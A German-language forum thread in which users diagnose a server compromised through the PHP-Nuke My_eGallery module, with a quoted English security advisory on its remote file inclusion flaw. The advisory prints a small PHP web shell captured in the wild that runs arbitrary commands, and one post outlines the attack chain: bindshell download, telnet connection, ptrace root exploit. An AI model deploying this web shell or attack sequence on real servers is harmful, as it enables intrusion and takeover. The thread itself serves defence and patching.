RootForum Community

4. 'chmod 777' modules/My_eGallery/temp in order to enable to visitors to post media.
For security reasons, you should put this file in another location.
The new path can be written in MeG admin panel (General Settings)

s4fuser wrote:Mein tmp-Verzeichnis hat einen Pfad á la ./nufw9wh84rw48t/pokjtnth493t/bfen8943/tmp.

Joe User wrote:Oder was glaubst Du woher die jeweilige Anwendung den Pfad kennt?

Joe User wrote:Es ist egal wie kryptisch das tmp "versteckt" wird, da es an mehreren Stellen gespeichert wird und somit immer "gefunden" werden kann. Oder was glaubst Du woher die jeweilige Anwendung den Pfad kennt?

webhilfe wrote:Kann mich da nur anschliessen. Der User sucht sich ja das tmp Verzeichniss nicht selbst aus.

webhilfe wrote:Es muss da doch eine Lösung geben????

Joe User wrote:

webhilfe wrote:Es muss da doch eine Lösung geben????

Gibt es: Auf unbekannte/unsichere Scripts verzichten!

v00dY wrote:modproxy hat damit nichts zu tun.
das php script ist schlecht gecodet, dieses erlaubt fremde seiten anzusurfen.
man kann das aber trozdem verhindern in dem man allow_url_fopen in php deaktiviert.

was der hacker gemacht hat..
der hat zuerst nach deiner kernel version geschaut.
dann hat er eine bindshell gedownloadet, ausführbar gemacht und gestartet.
hat danach auf die bindshell via telnet connected und via ptrace kernel exploit root rechte erlangt..

s4fuser wrote:@Joe: Das verstehe ich nicht.
Ein Angreifer lädt mittels Upload-Modul eine Text-Datei hoch.

s4fuser wrote:Diese wird auf dem Server in ein temp-Verzeichnis verschoben, dessen Pfad der Angreifer nicht kennt (vorausgesetzt, der Betreiber hat den Pfad angepasst).
Erkläre mir bitte mal, wie der Angreifer die Datei ausführen will, wenn er den Pfad nicht kennt.

Joe User wrote:Scripte sind ebenfalls Textdateien ;)

Joe User wrote:Da das tmp mit 777 angelegt wird, kann dort jeder tun und lassen was er möchte, unter Anderem auch Scripte ausführen, welche sich selbst den eigenen Pfad ermitteln, zum Beispiel als Shellscript mittels `pwd`...

v00dY wrote:>>Prima, ich hab mod_proxy abgeschaltet und danach war das ganze nicht mehr möglich.
dann hast du bestimmt fopen gleichzeitig mit abgeschaltet? :D

>>Meinst Du wirklich das der Angreifer root rechte hat? Kann ich das irgendwie herausbekommen?
wenn du den kernel nicht gepatcht hast oder ein update eingespielt hast,
dann hat das 100pro geklappt.
die standart kernels bei 1&1 sind meines wissens nicht gepatcht.
ansonsten um es zu testen.. da gibts chkrootkit's wobei die nur rootkits aufdecken und auch nicht alle.

Linux version 2.4.21-lufs-030704 (jacko@neverland) (gcc version 2.95.4 20011002 (Debian prerelease)) #1 SMP

das beste ist das system selber zu checken, wenn du das nicht kannst dann lasse den server reinstallieren.

Mal ne generelle ernstgemeinte Frage:

Was ist an Nuke überhaupt sicher ??

Ich hatte es selbst mal ne Zeit lang laufen und ich bin froh, daß ich es wieder runter habe ....

Ich glaube, den Serveranbieter wechseln bringt bei Nuke gar nix ....

Gruß Outi

die standart kernels bei 1&1 sind meines wissens nicht gepatcht.
ansonsten um es zu testen.. da gibts chkrootkit's wobei die nur rootkits aufdecken und auch nicht alle.

SUMMARY

<http://lottasophie.sourceforge.net/index.php> My_eGallery is "a very
nice PostNuke module, which allows users to create and manipulate their
own galleries on the web, plus offers various additional features". A
vulnerability in the product allows remote attackers to inject code and
cause it to execute under the privilieges My_eGallery runs under.

DETAILS

Vulnerable systems:
* My_eGallery version 3.1.1.f and prior

Immune systems:
* My_eGallery version 3.1.1.g

Certain PHP files have some parameters which are used in include functions
not filtered. An intruder can craft PHP code on their Web site and supply
parameter to My_eGallery so it actually includes malicious PHP code.

The following code was captured as being used in the wild (edited
intentionally):
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>

This allows execution of any command on the server with My_eGallery, under
the privileges of the Web server (usually apache or httpd).

Solution:
Vendor was contacted and promptly replied. Fix is available at the
vendor's site:
<http://lottasophie.sourceforge.net/modu ... load&cid=5>
http://lottasophie.sourceforge.net/modu ... load&cid=5

As this was seen being exploited in the wild, users are urged to upgrade
to the latest version as soon as possible.

webhilfe wrote:Moin Moin :-D
Das Nuke nicht sicher ist, ist mir nun leider auch wieder klar :-(
Aber welcher Server ist schon sicher?!